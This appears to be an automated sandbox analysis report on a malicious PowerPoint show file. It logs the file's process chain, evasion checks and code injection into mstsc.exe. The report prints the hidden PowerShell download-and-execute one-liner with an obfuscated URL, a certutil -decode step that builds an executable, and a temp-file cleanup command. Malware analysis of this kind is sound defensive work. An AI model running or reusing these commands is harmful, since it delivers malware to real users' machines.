Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1524"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1840"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="848"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1808"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1704"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1900"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="520"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1124"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="952"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="2256"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="2324"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="2496"::GetOwner

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\powerpnt.exe' /s 'C:\order.ppsx'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\LUKETA~1\AppData\Local\Temp\ii.jse'
Source: unknown	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: unknown	Process created: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /U /Q /C del /Q/F %TEMP%\.exe && del /Q/F %TEMP%\.gop && del /Q/F %TEMP%\.txt && del /Q/F %TEMP%\.log && del /Q/F %TEMP%\*.jse
Source: unknown	Process created: C:\Windows\System32\mstsc.exe C:\Windows\System32\mstsc.exe 'C:\Users\LUKETA~1\AppData\Local\Temp\484.exe'
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\LUKETA~1\AppData\Local\Temp\ii.jse'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /U /Q /C del /Q/F %TEMP%\.exe && del /Q/F %TEMP%\.gop && del /Q/F %TEMP%\.txt && del /Q/F %TEMP%\.log && del /Q/F %TEMP%\*.jse
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Process created: C:\Windows\System32\mstsc.exe C:\Windows\System32\mstsc.exe 'C:\Users\LUKETA~1\AppData\Local\Temp\484.exe'

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Contains functionality to call native functions

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_0040F995 GetProcessHeap,CreateProcessW,GetProcessHeap,HeapAlloc,GetShellWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetModuleHandleA,GetProcAddress,NtCreateSection,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,	10_2_0040F995
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_0040F6F4 GetProcessHeap,GetProcessHeap,HeapAlloc,GetClipboardSequenceNumber,GetProcessHeap,HeapAlloc,GetShellWindow,GetModuleHandleA,GetProcAddress,NtMapViewOfSection,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,	10_2_0040F6F4
Source: C:\Windows\System32\mstsc.exe	Code function: 13_2_0006E0EF NtQuerySystemInformation,GetProcessHeap,GetProcessHeap,HeapAlloc,GetShellWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,ReleaseCapture,LoadLibraryA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,NtQuerySystemInformation,NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,VirtualFree,	13_2_0006E0EF

Contains functionality to launch a process as a different user

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Code function: 10_2_004064D2 OpenProcess,ProcessIdToSessionId,CloseHandle,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,SetTokenInformation,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,SetTokenInformation,CreateEnvironmentBlock,GetProcessHeap,HeapAlloc,GetCaretBlinkTime,GetProcessHeap,HeapAlloc,CreatePopupMenu,CreateProcessAsUserW,CloseHandle,OpenProcessToken,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,

10_2_004064D2

Contains functionality to shutdown / reboot the system

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_00401D22 GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,GetProcessHeap,ExitWindowsEx,GetProcessHeap,HeapFree,		10_2_00401D22
Source: C:\Windows\System32\mstsc.exe	Code function: 13_2_00061D22 GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,GetProcessHeap,ExitWindowsEx,GetProcessHeap,HeapFree,		13_2_00061D22

Creates files inside the system directory

Show sources

Source: C:\Windows\System32\certutil.exe

File created: C:\Windows\cerF439.tmp

Creates mutexes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex

Deletes Windows files

Show sources

Source: C:\Windows\System32\certutil.exe

File deleted: C:\Windows\cerF439.tmp

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Windows\System32\drivers\etc\hosts

Tries to load missing DLLs

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: api-ms-win-appmodel-runtime-l1-1-2.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: api-ms-win-appmodel-runtime-l1-1-0.dll

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to add an ACL to a security descriptor

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Code function: 10_2_0040D8BA AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityW,FreeSid,LocalFree,LocalFree,LocalFree,

10_2_0040D8BA

Contains functionality to create a new security descriptor

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

10_2_004064D2

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: wscript.exe, mstsc.exe	Binary or memory string: Progman
Source: wscript.exe, mstsc.exe	Binary or memory string: Program Manager
Source: wscript.exe, mstsc.exe	Binary or memory string: Shell_TrayWnd

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Section loaded: unknown target pid: 3140 protection: execute and read and write

Writes to foreign memory regions

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Memory written: C:\Windows\System32\mstsc.exe base: E384EC
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Memory written: C:\Windows\System32\mstsc.exe base: E384ED
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Memory written: C:\Windows\System32\mstsc.exe base: E384EE
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Memory written: C:\Windows\System32\mstsc.exe base: E384EF
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Memory written: C:\Windows\System32\mstsc.exe base: E384F0

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\wscript.exe	Network Connect: 185.159.82.38 200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 46.21.169.110 80

Anti Debugging:

Contains functionality to register its own exception handler

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_0041FFF1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_0041FFF1
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_00420488 SetUnhandledExceptionFilter,	10_2_00420488
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_004224C7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_004224C7
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_1_0041FFF1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_1_0041FFF1
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_1_004224C7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_1_004224C7

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write and page guard

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System information queried: KernelDebuggerInformation

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Code function: 10_2_0041FFF1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

10_2_0041FFF1

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

10_2_0040EFB9

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Code function: 10_2_0040F995 GetProcessHeap,CreateProcessW,GetProcessHeap,HeapAlloc,GetShellWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetModuleHandleA,GetProcAddress,NtCreateSection,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,

10_2_0040F995

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_004022E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	10_2_004022E6
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_0040DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	10_2_0040DDBF
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_00401E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	10_2_00401E16
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_0040BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	10_2_0040BB40
Source: C:\Windows\System32\mstsc.exe	Code function: 13_2_00061E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	13_2_00061E16
Source: C:\Windows\System32\mstsc.exe	Code function: 13_2_000622E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	13_2_000622E6
Source: C:\Windows\System32\mstsc.exe	Code function: 13_2_0006BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	13_2_0006BB40
Source: C:\Windows\System32\mstsc.exe	Code function: 13_2_0006DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	13_2_0006DDBF

Contains functionality to query system information

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Code function: 10_2_0040C055 GetProcessHeap,GetProcessHeap,HeapAlloc,IsSystemResumeAutomatic,GetProcessHeap,HeapAlloc,GetClipboardSequenceNumber,GetModuleHandleA,GetProcAddress,GlobalMemoryStatusEx,GetSystemInfo,GetProcessHeap,HeapAlloc,GetDesktopWindow,RegOpenKeyW,HeapFree,GetProcessHeap,HeapAlloc,GetClipboardViewer,RegQueryValueExW,HeapFree,GetProcessHeap,HeapAlloc,CountClipboardFormats,StrStrIW,StrStrIW,Sleep,StrStrIW,GetProcessHeap,HeapFree,HeapFree,RegCloseKey,GetProcessHeap,HeapFree,Sleep,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

10_2_0040C055

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Checks the free space of harddrives

Show sources

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File Volume queried: C:\Windows\System32 FullSizeInformation

Contains capabilities to detect virtual machines

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion

Contains functionality to detect sandboxes (foreground window change detection)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,ReleaseCapture,ExpandEnvironmentStringsW,GetShortPathNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,wsprintfW,GetProcessHeap,GetProcessHeap,HeapAlloc,RevertToSelf,CoInitializeEx,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,LoadLibraryA,GetProcAddress,GetLastError,Sleep,GetForegroundWindow,CoUninitialize,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,		10_2_0040A0EE
Source: C:\Windows\System32\mstsc.exe	Code function: GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,ReleaseCapture,ExpandEnvironmentStringsW,GetShortPathNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,wsprintfW,GetProcessHeap,GetProcessHeap,HeapAlloc,RevertToSelf,CoInitializeEx,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,LoadLibraryA,GetProcAddress,GetLastError,Sleep,GetForegroundWindow,CoUninitialize,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,		13_2_0006A0EE

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: -922337203685477

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft

Found WSH timer for Javascript or VBS script (likely evasive script)

Show sources

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Found evasive API chain (may stop execution after accessing registry keys)

Show sources

Source: C:\Windows\System32\mstsc.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

graph_13-3213

Found large amount of non-executed APIs

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	API coverage: 5.3 %
Source: C:\Windows\System32\mstsc.exe	API coverage: 4.7 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448	Thread sleep time: -922337203685477s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 2536	Thread sleep time: -120000s >= -60s
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe TID: 3080	Thread sleep time: -31000s >= -60s
Source: C:\Windows\System32\mstsc.exe TID: 3144	Thread sleep time: -10000s >= -60s
Source: C:\Windows\System32\mstsc.exe TID: 3144	Thread sleep time: -10000s >= -60s

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Windows\System32\mstsc.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep			graph_13-3133
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep			graph_10-12082

Found stalling execution ending in API Sleep call

Show sources

Source: C:\Windows\System32\mstsc.exe

Stalling execution: Execution stalls by calling Sleep

graph_13-3220

Sample execution stops while process was sleeping (likely an evasion)

Show sources

Source: C:\Windows\System32\mstsc.exe

Last function: Thread delayed

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Process information set: FAILCRITICALERRORS and NOGPFAULTERRORBOX
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mstsc.exe	Process information set: FAILCRITICALERRORS and NOGPFAULTERRORBOX

Extensive use of GetProcAddress (often used to hide API calls)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Code function: 10_2_001702B2 RtlExitUserThread,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

10_2_001702B2

Uses certutil -decode

Show sources

Source: unknown	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Language, Device and Operating System Detection:

Contains functionality to query local / system time

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Code function: 10_2_0040DAD5 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,GetProcessHeap,HeapAlloc,ReleaseCapture,CreateFileW,GetFileTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

10_2_0040DAD5

Contains functionality to query the account / user name

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

